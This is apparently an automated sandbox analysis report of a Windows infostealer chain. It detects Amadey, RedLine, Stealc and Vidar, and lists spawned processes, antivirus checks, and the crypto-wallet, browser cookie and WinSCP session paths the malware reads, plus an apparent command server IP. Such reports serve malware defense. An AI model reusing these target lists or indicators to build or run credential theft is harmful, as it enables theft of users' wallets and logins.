Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Users\user\AppData\RoamingAEGIJKEHCA.exe "C:\Users\user\AppData\RoamingAEGIJKEHCA.exe"	Jump to behavior
Source: C:\Users\user\AppData\RoamingAEGIJKEHCA.exe	Process created: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe "C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe"	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe	Process created: C:\Users\user\AppData\Local\Temp\1000002001\ba77748b9b.exe "C:\Users\user\AppData\Local\Temp\1000002001\ba77748b9b.exe"
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe	Process created: C:\Users\user\1000003002\ead6a72944.exe "C:\Users\user\1000003002\ead6a72944.exe"
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	Process created: C:\Users\user\AppData\Local\Temp\1000025001\PharmaciesDetection.exe "C:\Users\user\AppData\Local\Temp\1000025001\PharmaciesDetection.exe"
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	Process created: C:\Users\user\AppData\Local\Temp\1000027001\buildred.exe "C:\Users\user\AppData\Local\Temp\1000027001\buildred.exe"
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	Process created: C:\Users\user\AppData\Local\Temp\1000028001\build2.exe "C:\Users\user\AppData\Local\Temp\1000028001\build2.exe"
Source: C:\Users\user\AppData\Local\Temp\1000025001\PharmaciesDetection.exe	Process created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /k move Ruth Ruth.cmd & Ruth.cmd & exit
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\tasklist.exe tasklist
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\findstr.exe findstr /I "wrsa.exe opssvc.exe"
Source: C:\Windows\SysWOW64\cmd.exe	Process created: unknown unknown
Source: C:\Windows\SysWOW64\cmd.exe	Process created: unknown unknown
Source: C:\Windows\SysWOW64\cmd.exe	Process created: unknown unknown
Source: C:\Windows\SysWOW64\cmd.exe	Process created: unknown unknown
Source: C:\Windows\SysWOW64\cmd.exe	Process created: unknown unknown
Source: C:\Windows\SysWOW64\cmd.exe	Process created: unknown unknown
Source: C:\Windows\SysWOW64\cmd.exe	Process created: unknown unknown
Source: C:\Users\user\1000003002\ead6a72944.exe	Process created: C:\Windows\System32\cmd.exe "C:\Windows\sysnative\cmd.exe" /c "C:\Users\user\AppData\Local\Temp\7366.tmp\7367.tmp\7368.bat C:\Users\user\1000003002\ead6a72944.exe"
Source: C:\Windows\System32\cmd.exe	Process created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" "https://www.youtube.com/account"
Source: C:\Windows\System32\cmd.exe	Process created: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" "https://www.youtube.com/account"
Source: C:\Windows\System32\cmd.exe	Process created: C:\Program Files\Mozilla Firefox\firefox.exe "C:\Program Files\Mozilla Firefox\firefox.exe" "https://www.youtube.com/account"

Source: firefox.exe, 00000028.00000002.2853946051.000000BCB0EBB000.00000004.00000010.00020000.00000000.sdmp	Binary or memory string: ?ProgmanListenerWindow
Source: axplong.exe, axplong.exe, 0000000A.00000002.2311209476.00000000010C1000.00000040.00000001.01000000.0000000D.sdmp	Binary or memory string: TProgram Manager
Source: PharmaciesDetection.exe, 00000015.00000003.2671343184.00000000027AB000.00000004.00000020.00020000.00000000.sdmp, Buyer.pif.23.dr	Binary or memory string: @EXITMETHOD@EXITCODEShell_TrayWnd-CALLGUICTRLREGISTERLISTVIEWSORTGUICTRLCREATELISTVIEWITEMGUICTRLCREATETREEVIEWITEMGUICTRLCREATECONTEXTMENUONAUTOITEXITUNREGISTERGUICTRLCREATELISTVIEWGUICTRLCREATEMENUITEMGUICTRLCREATECHECKBOXGUICTRLCREATEMONTHCALGUICTRLCREATEPROGRESSGUICTRLCREATETREEVIEWGUICTRLCREATEGRAPHICSTRINGFROMASCIIARRAYONAUTOITEXITREGISTERGUICTRLCREATETABITEMGUICTRLSETDEFBKCOLORINIREADSECTIONNAMESGUICTRLCREATEBUTTONDLLCALLBACKREGISTERGUICTRLCREATEUPDOWNGUICTRLCREATESLIDERSTRINGREGEXPREPLACEOBJCREATEINTERFACEGUICTRLSENDTODUMMYFILECREATESHORTCUTGUICTRLCREATEINPUTSOUNDSETWAVEVOLUMEFILECREATENTFSLINKGUISETACCELERATORSGUICTRLCREATECOMBOGUICTRLSETDEFCOLORPROCESSSETPRIORITYGUICTRLSETRESIZINGSTRINGTOASCIIARRAYDRIVEGETFILESYSTEMGUICTRLCREATEDUMMYTRAYITEMSETONEVENTGUICTRLCREATERADIOWINMINIMIZEALLUNDOGUICTRLCREATEGROUPGUICTRLCREATELABELAUTOITWINSETTITLEGUICTRLSETBKCOLORAUTOITWINGETTITLEGUICTRLSETGRAPHICGUICTRLCREATEDATEGUICTRLCREATEICONGUICTRLSETONEVENTCONSOLEWRITEERRORDLLCALLBACKGETPTRGUICTRLCREATELISTTRAYITEMGETHANDLEFILEFINDFIRSTFILEGUICTRLCREATEEDITGUICTRLCREATEMENUWINMENUSELECTITEMGUICTRLSETCURSORDLLSTRUCTGETDATASTATUSBARGETTEXTFILERECYCLEEMPTYFILESELECTFOLDERTRAYITEMSETSTATEDLLSTRUCTSETDATATRAYITEMGETSTATEWINGETCLIENTSIZEGUICTRLCREATEAVIHTTPSETUSERAGENTGUICTRLCREATEPICCONTROLGETHANDLEGUIGETCURSORINFOTRAYSETPAUSEICONFILEFINDNEXTFILEINIRENAMESECTIONDLLSTRUCTGETSIZESHELLEXECUTEWAITPROCESSWAITCLOSEGUICTRLCREATETABFILEGETSHORTNAMEWINWAITNOTACTIVEGUICTRLCREATEOBJGUICTRLGETHANDLESTRINGTRIMRIGHTGUICTRLSETLIMITGUICTRLSETIMAGEINIWRITESECTIONCONTROLTREEVIEWAUTOITSETOPTIONGUICTRLSETCOLORDLLSTRUCTGETPTRADLIBUNREGISTERDRIVESPACETOTALGUICTRLSETSTATEWINGETCLASSLISTGUICTRLGETSTATEFILEGETSHORTCUTDLLSTRUCTCREATEPROCESSGETSTATSCONTROLGETFOCUSDLLCALLBACKFREEGUICTRLSETSTYLEFILEREADTOARRAYTRAYITEMSETTEXTCONTROLLISTVIEWTRAYITEMGETTEXTFILEGETENCODINGFILEGETLONGNAMEGUICTRLSENDMSGSENDKEEPACTIVEDRIVESPACEFREEFILEOPENDIALOGGUICTRLRECVMSGCONTROLCOMMANDSTRINGTOBINARYWINMINIMIZEALLSTRINGISXDIGITTRAYSETONEVENTFILESAVEDIALOGDUMMYSPEEDTESTCONTROLGETTEXTMOUSECLICKDRAGGUICTRLSETFONTMOUSEGETCURSORWINGETCARETPOSCONTROLSETTEXTTRAYITEMDELETESTRINGTRIMLEFTDRIVEGETSERIALBINARYTOSTRINGGUICTRLSETDATAINIREADSECTIONUDPCLOSESOCKETCONTROLDISABLETRAYCREATEMENUTCPCLOSESOCKETDLLCALLADDRESSFILEGETVERSIONGUIREGISTERMSGTRAYSETTOOLTIPTRAYCREATEITEMDRIVEGETDRIVESTRINGISASCIISTRINGCOMPARESTRINGISALPHAPROCESSEXISTSSTRINGREVERSESTRINGSTRIPCRSPLASHIMAGEONGUICTRLSETTIPGUISTARTGROUPCONTROLGETPOSFILEGETATTRIBADLIBREGISTERDRIVESETLABELGUICTRLDELETEFILECHANGEDIRFILEWRITELINEPIXELCHECKSUMDRIVEGETLABELGUICTRLSETPOSGUISETBKCOLORPIXELGETCOLORSTRINGISDIGITSTRINGISFLOATWINWAITACTIVESTRINGISALNUMSTRINGISLOWERSTRINGISSPACEGUISETONEVENTSTRINGREPLACESTRINGSTRIPWSCONTROLENABLESTRINGISUPPERWINGETPROCESSFILESETATTRIBCONTROLFOCUSFILEREADLINEPROCESSCLOSEGUISETCURSORSPLASHTEXTONSTRINGFORMATTRAYSETSTATESTRINGREGEXPCONTROLCLICKSHELLEXECUTETRAYSETCLICKWINWAITCLOSEHTTPSETPROXYDRIVEGETTYPEWINGETHANDLECONSOLEWRITEGUIGETSTYLECONTROL
Source: RoamingAEGIJKEHCA.exe, RoamingAEGIJKEHCA.exe, 00000008.00000002.2345735174.00000000005CE000.00000040.00000001.01000000.0000000B.sdmp, explorti.exe, 0000000F.00000002.2374969784.0000000000BAE000.00000040.00000001.01000000.0000000F.sdmp, explorti.exe, 00000010.00000002.2374830999.0000000000BAE000.00000040.00000001.01000000.0000000F.sdmp	Binary or memory string: FM/Program Manager

Contains functionality to query CPU information (cpuid)

Source: C:\Users\user\Desktop\file.exe

Code function: 0_2_6C70B341 cpuid

0_2_6C70B341

Contains functionality to query locales information (e.g. system language)

Source: C:\Users\user\Desktop\file.exe

Code function: GetKeyboardLayoutList,LocalAlloc,GetKeyboardLayoutList,GetLocaleInfoA,LocalFree,

0_2_00417630

Queries information about the installed CPU (vendor, model number etc)

Source: C:\Users\user\Desktop\file.exe	Registry key value queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0			Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Registry key value queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0			Jump to behavior

Queries the installation date of Windows

Source: C:\Users\user\AppData\Local\Temp\1000028001\build2.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion InstallDate

Queries the volume information (name, serial number etc) of a device

Source: C:\Users\user\Desktop\file.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\1000002001\ba77748b9b.exe VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\1000002001\ba77748b9b.exe VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe	Queries volume information: C:\Users\user\1000003002\ead6a72944.exe VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe	Queries volume information: C:\Users\user\1000003002\ead6a72944.exe VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\1000025001\PharmaciesDetection.exe VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\1000025001\PharmaciesDetection.exe VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\1000027001\buildred.exe VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\1000027001\buildred.exe VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\1000028001\build2.exe VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\1000028001\build2.exe VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\1000002001\ba77748b9b.exe	Queries volume information: C:\ VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\1000027001\buildred.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\1000027001\buildred.exe VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\1000027001\buildred.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\1000027001\buildred.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\1000027001\buildred.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\1000027001\buildred.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.CSharp\v4.0_4.0.0.0__b03f5f7f11d50a3a\Microsoft.CSharp.dll VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\1000027001\buildred.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Dynamic\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Dynamic.dll VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\1000027001\buildred.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.ServiceModel\v4.0_4.0.0.0__b77a5c561934e089\System.ServiceModel.dll VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\1000027001\buildred.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.IdentityModel\v4.0_4.0.0.0__b77a5c561934e089\System.IdentityModel.dll VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\1000027001\buildred.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\SMDiagnostics\v4.0_4.0.0.0__b77a5c561934e089\SMDiagnostics.dll VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\1000027001\buildred.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.ServiceModel.Internals\v4.0_4.0.0.0__31bf3856ad364e35\System.ServiceModel.Internals.dll VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\1000027001\buildred.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\1000027001\buildred.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Security\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Security.dll VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\1000027001\buildred.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Web.Extensions\v4.0_4.0.0.0__31bf3856ad364e35\System.Web.Extensions.dll VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\1000027001\buildred.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Web\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Web.dll VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\1000027001\buildred.exe	Queries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\lockfile VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\1000027001\buildred.exe	Queries volume information: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\lockfile VolumeInformation
Source: C:\Windows\System32\cmd.exe	Queries volume information: C:\ VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\1000002001\ba77748b9b.exe	Queries volume information: C:\ VolumeInformation

Source: C:\Users\user\Desktop\file.exe

Code function: 0_2_00417420 GetProcessHeap,HeapAlloc,GetLocalTime,wsprintfA,

0_2_00417420

Source: C:\Users\user\Desktop\file.exe

Code function: 0_2_004172F0 GetProcessHeap,HeapAlloc,GetUserNameA,

0_2_004172F0

Source: C:\Users\user\Desktop\file.exe

Code function: 0_2_004174D0 GetProcessHeap,HeapAlloc,GetTimeZoneInformation,wsprintfA,

0_2_004174D0

Source: C:\Users\user\AppData\Local\Temp\1000027001\buildred.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

AV process strings found (often used to terminate AV products)

Source: Amcache.hve.13.dr	Binary or memory string: c:\programdata\microsoft\windows defender\platform\4.18.23080.2006-0\msmpeng.exe
Source: Amcache.hve.13.dr	Binary or memory string: msmpeng.exe
Source: Amcache.hve.13.dr	Binary or memory string: c:\program files\windows defender\msmpeng.exe
Source: Amcache.hve.13.dr	Binary or memory string: MsMpEng.exe

Checks if Antivirus/Antispyware/Firewall program is installed (via WMI)

Source: C:\Users\user\AppData\Local\Temp\1000027001\buildred.exe	WMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter : SELECT * FROM AntivirusProduct
Source: C:\Users\user\AppData\Local\Temp\1000027001\buildred.exe	WMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter : SELECT * FROM AntiSpyWareProduct
Source: C:\Users\user\AppData\Local\Temp\1000027001\buildred.exe	WMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter : SELECT * FROM FirewallProduct
Source: C:\Users\user\AppData\Local\Temp\1000027001\buildred.exe	WMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter2 : SELECT * FROM AntivirusProduct
Source: C:\Users\user\AppData\Local\Temp\1000027001\buildred.exe	WMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter2 : SELECT * FROM AntiSpyWareProduct
Source: C:\Users\user\AppData\Local\Temp\1000027001\buildred.exe	WMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter2 : SELECT * FROM FirewallProduct

Stealing of Sensitive Information

Yara detected Amadeys stealer DLL

Source: Yara match	File source: 9.2.axplong.exe.ec0000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 15.2.explorti.exe.9c0000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 16.2.explorti.exe.9c0000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 10.2.axplong.exe.ec0000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 5.2.RoamingBKKFHIEGDH.exe.a50000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 8.2.RoamingAEGIJKEHCA.exe.3e0000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000008.00000002.2345647298.00000000003E1000.00000040.00000001.01000000.0000000B.sdmp, type: MEMORY
Source: Yara match	File source: 0000000F.00000002.2374868692.00000000009C1000.00000040.00000001.01000000.0000000F.sdmp, type: MEMORY
Source: Yara match	File source: 00000010.00000003.2334485830.0000000004FB0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000013.00000003.2619079052.00000000051C0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000005.00000002.2268957784.0000000000A51000.00000040.00000001.01000000.00000009.sdmp, type: MEMORY
Source: Yara match	File source: 00000008.00000003.2257667702.00000000052D0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000009.00000002.2308246588.0000000000EC1000.00000040.00000001.01000000.0000000D.sdmp, type: MEMORY
Source: Yara match	File source: 0000000F.00000003.2334562706.00000000051A0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000009.00000003.2265462516.0000000005430000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000A.00000003.2270527993.0000000005570000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000005.00000003.2225343744.0000000004CB0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000A.00000002.2311063767.0000000000EC1000.00000040.00000001.01000000.0000000D.sdmp, type: MEMORY
Source: Yara match	File source: 00000010.00000002.2374750517.00000000009C1000.00000040.00000001.01000000.0000000F.sdmp, type: MEMORY
Source: Yara match	File source: 00000014.00000003.2615701145.0000000004AF0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY

Yara detected RedLine Stealer

Source: Yara match	File source: dump.pcap, type: PCAP
Source: Yara match	File source: 26.0.buildred.exe.800000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0000001A.00000000.2683951657.0000000000802000.00000002.00000001.01000000.00000012.sdmp, type: MEMORY
Source: Yara match	File source: 0000001A.00000002.2927923428.0000000002C37000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: buildred.exe PID: 6340, type: MEMORYSTR
Source: Yara match	File source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\T9RRWRNL\buildred[1].exe, type: DROPPED
Source: Yara match	File source: C:\Users\user\AppData\Local\Temp\1000027001\buildred.exe, type: DROPPED

Yara detected Stealc

Source: Yara match	File source: 00000000.00000002.2420117641.00000000026D7000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000016.00000002.2778366166.00000000027D7000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000002E.00000002.2853920976.00000000026FA000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: file.exe PID: 616, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: ba77748b9b.exe PID: 3144, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: ba77748b9b.exe PID: 8448, type: MEMORYSTR
Source: Yara match	File source: decrypted.memstr, type: MEMORYSTR
Source: Yara match	File source: dump.pcap, type: PCAP

Yara detected Vidar

Source: Yara match

File source: sslproxydump.pcap, type: PCAP

Yara detected Vidar stealer

Source: Yara match

File source: Process Memory Space: file.exe PID: 616, type: MEMORYSTR

Found many strings related to Crypto-Wallets (likely being stolen)

Source: file.exe	String found in binary or memory: lockstream Green\|1\|\Blockstream\Green\wallets\\|.\|1\|Wasabi Wallet\|1\|\WalletWasabi\Client\Wallets\\|.json\|0\|Ethereum\|1\|\Ethereum\\|keystore\|0\|Electrum\|1\|\Electrum\wallets\\|.\|0\|ElectrumLTC\|1\|\Electrum-LTC\wallets\\|.*\|0\|Exodus\|1\|\Exodus\\|exodus.conf.json\|0\|Exo
Source: file.exe	String found in binary or memory: us\|1\|\Exodus\\|window-state.json\|0\|Exodus\exodus.wallet\|1\|\Exodus\exodus.wallet\\|passphrase.json\|0\|Exodus\exodus.wallet\|1\|\Exodus\exodus.wallet\\|seed.seco\|0\|Exodus\exodus.wallet\|1\|\Exodus\exodus.wallet\\|info.seco\|0\|Electron Cash\|1\|\ElectronCash\wallets\\|.\|0\|M
Source: file.exe	String found in binary or memory: lockstream Green\|1\|\Blockstream\Green\wallets\\|.\|1\|Wasabi Wallet\|1\|\WalletWasabi\Client\Wallets\\|.json\|0\|Ethereum\|1\|\Ethereum\\|keystore\|0\|Electrum\|1\|\Electrum\wallets\\|.\|0\|ElectrumLTC\|1\|\Electrum-LTC\wallets\\|.*\|0\|Exodus\|1\|\Exodus\\|exodus.conf.json\|0\|Exo
Source: file.exe	String found in binary or memory: us\|1\|\Exodus\\|window-state.json\|0\|Exodus\exodus.wallet\|1\|\Exodus\exodus.wallet\\|passphrase.json\|0\|Exodus\exodus.wallet\|1\|\Exodus\exodus.wallet\\|seed.seco\|0\|Exodus\exodus.wallet\|1\|\Exodus\exodus.wallet\\|info.seco\|0\|Electron Cash\|1\|\ElectronCash\wallets\\|.\|0\|M
Source: file.exe	String found in binary or memory: \jaxx\Local Storage\
Source: file.exe	String found in binary or memory: lockstream Green\|1\|\Blockstream\Green\wallets\\|.\|1\|Wasabi Wallet\|1\|\WalletWasabi\Client\Wallets\\|.json\|0\|Ethereum\|1\|\Ethereum\\|keystore\|0\|Electrum\|1\|\Electrum\wallets\\|.\|0\|ElectrumLTC\|1\|\Electrum-LTC\wallets\\|.*\|0\|Exodus\|1\|\Exodus\\|exodus.conf.json\|0\|Exo
Source: file.exe	String found in binary or memory: lockstream Green\|1\|\Blockstream\Green\wallets\\|.\|1\|Wasabi Wallet\|1\|\WalletWasabi\Client\Wallets\\|.json\|0\|Ethereum\|1\|\Ethereum\\|keystore\|0\|Electrum\|1\|\Electrum\wallets\\|.\|0\|ElectrumLTC\|1\|\Electrum-LTC\wallets\\|.*\|0\|Exodus\|1\|\Exodus\\|exodus.conf.json\|0\|Exo
Source: file.exe	String found in binary or memory: us\|1\|\Exodus\\|window-state.json\|0\|Exodus\exodus.wallet\|1\|\Exodus\exodus.wallet\\|passphrase.json\|0\|Exodus\exodus.wallet\|1\|\Exodus\exodus.wallet\\|seed.seco\|0\|Exodus\exodus.wallet\|1\|\Exodus\exodus.wallet\\|info.seco\|0\|Electron Cash\|1\|\ElectronCash\wallets\\|.\|0\|M
Source: file.exe	String found in binary or memory: lockstream Green\|1\|\Blockstream\Green\wallets\\|.\|1\|Wasabi Wallet\|1\|\WalletWasabi\Client\Wallets\\|.json\|0\|Ethereum\|1\|\Ethereum\\|keystore\|0\|Electrum\|1\|\Electrum\wallets\\|.\|0\|ElectrumLTC\|1\|\Electrum-LTC\wallets\\|.*\|0\|Exodus\|1\|\Exodus\\|exodus.conf.json\|0\|Exo
Source: file.exe	String found in binary or memory: passphrase.json
Source: file.exe	String found in binary or memory: \jaxx\Local Storage\
Source: file.exe	String found in binary or memory: \Ethereum\
Source: file.exe	String found in binary or memory: lockstream Green\|1\|\Blockstream\Green\wallets\\|.\|1\|Wasabi Wallet\|1\|\WalletWasabi\Client\Wallets\\|.json\|0\|Ethereum\|1\|\Ethereum\\|keystore\|0\|Electrum\|1\|\Electrum\wallets\\|.\|0\|ElectrumLTC\|1\|\Electrum-LTC\wallets\\|.*\|0\|Exodus\|1\|\Exodus\\|exodus.conf.json\|0\|Exo
Source: file.exe, 00000000.00000002.2420117641.0000000002726000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: 185.215.113.16fons\AppData\Roaming\Binance\.finger-print.fpFm_@.
Source: file.exe	String found in binary or memory: Ethereum
Source: file.exe	String found in binary or memory: file__0.localstorage
Source: file.exe	String found in binary or memory: \Coinomi\Coinomi\wallets\
Source: file.exe	String found in binary or memory: \Exodus\exodus.wallet\
Source: file.exe	String found in binary or memory: ltiDoge\|1\|\MultiDoge\\|multidoge.wallet\|0\|Jaxx Desktop (old)\|1\|\jaxx\Local Storage\\|file__0.localstorage\|0\|Jaxx Desktop\|1\|\com.liberty.jaxx\IndexedDB\file__0.indexeddb.leveldb\\|.\|0\|Atomic\|1\|\atomic\Local Storage\leveldb\\|.\|0\|Binance\|1\|\Binance\\|app-store.js
Source: file.exe	String found in binary or memory: us\|1\|\Exodus\\|window-state.json\|0\|Exodus\exodus.wallet\|1\|\Exodus\exodus.wallet\\|passphrase.json\|0\|Exodus\exodus.wallet\|1\|\Exodus\exodus.wallet\\|seed.seco\|0\|Exodus\exodus.wallet\|1\|\Exodus\exodus.wallet\\|info.seco\|0\|Electron Cash\|1\|\ElectronCash\wallets\\|.\|0\|M
Source: file.exe	String found in binary or memory: lockstream Green\|1\|\Blockstream\Green\wallets\\|.\|1\|Wasabi Wallet\|1\|\WalletWasabi\Client\Wallets\\|.json\|0\|Ethereum\|1\|\Ethereum\\|keystore\|0\|Electrum\|1\|\Electrum\wallets\\|.\|0\|ElectrumLTC\|1\|\Electrum-LTC\wallets\\|.*\|0\|Exodus\|1\|\Exodus\\|exodus.conf.json\|0\|Exo
Source: file.exe	String found in binary or memory: lockstream Green\|1\|\Blockstream\Green\wallets\\|.\|1\|Wasabi Wallet\|1\|\WalletWasabi\Client\Wallets\\|.json\|0\|Ethereum\|1\|\Ethereum\\|keystore\|0\|Electrum\|1\|\Electrum\wallets\\|.\|0\|ElectrumLTC\|1\|\Electrum-LTC\wallets\\|.*\|0\|Exodus\|1\|\Exodus\\|exodus.conf.json\|0\|Exo

Tries to harvest and steal Bitcoin Wallet information

Source: C:\Users\user\Desktop\file.exe	Key opened: HKEY_CURRENT_USER\SOFTWARE\monero-project\monero-core	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1000028001\build2.exe	Key opened: HKEY_CURRENT_USER\Software\Bitcoin\Bitcoin-Qt
Source: C:\Users\user\AppData\Local\Temp\1000028001\build2.exe	Key opened: HKEY_CURRENT_USER\Software\monero-project\monero-core

Tries to harvest and steal Putty / WinSCP information (sessions, passwords, etc)

Source: C:\Users\user\AppData\Local\Temp\1000028001\build2.exe	Key opened: HKEY_CURRENT_USER\Software\Martin Prikryl\WinSCP 2\Sessions
Source: C:\Users\user\AppData\Local\Temp\1000028001\build2.exe	Key opened: HKEY_CURRENT_USER\Software\Martin Prikryl\WinSCP 2 Override

Tries to harvest and steal browser information (history, passwords, etc)

Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\v6zchhhv.default-release\places.sqlite-wal	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1000027001\buildred.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\v6zchhhv.default-release\cookies.sqlite
Source: C:\Users\user\AppData\Local\Temp\1000028001\build2.exe	File opened: C:\Users\user\AppData\Local\Mozilla\Firefox\Profiles
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\History-journal	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\v6zchhhv.default-release\cookies.sqlite-shm	Jump to behavior
